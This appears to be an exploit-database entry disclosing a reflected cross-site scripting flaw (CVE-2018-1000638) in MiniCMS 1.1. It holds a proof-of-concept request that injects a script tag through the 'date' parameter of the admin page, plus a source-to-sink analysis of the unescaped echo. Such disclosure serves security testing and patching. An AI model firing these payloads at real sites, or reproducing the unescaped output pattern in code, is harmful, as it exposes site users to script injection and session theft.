MiniCMS 1.1 - Cross Site Scripting (XSS)

Author: CodeSecLab
type: webapps
platform: php
port: 
date_added: 2025-04-11  
date_updated: 2025-04-13  
verified: 0  
codes: CVE-2018-1000638  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 52175.txt  

# Exploit Title: MiniCMS 1.1 - Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/bg5sbk/MiniCMS
# Software Link: https://github.com/bg5sbk/MiniCMS
# Version: 1.10
# Tested on: Ubuntu Windows
# CVE : CVE-2018-1000638

PoC:
GET http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>

"Sink": "echo $filter_date;", "Vulnerable Variable": "filter_date", "Source": "GET parameter 'date'", "Sanitization Mechanisms Before Patch": "None (directly echoed without encoding)", "Sink Context Constraints": "Injected in HTML attribute (URL query string)", "Attack Payload": ""><script>alert('XSS')</script>", "Execution Path Constraints": "The 'date' GET parameter must be set in the URL query string and passed without filtering", "Request URL": "http://minicms/mc-admin/page.php?date=%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E", "Request Parameter":"date","Request Method": "GET", "Final PoC": "http://minicms/mc-admin/page.php?date=\"><script>alert('XSS')</script>"

[Replace Your Domain Name]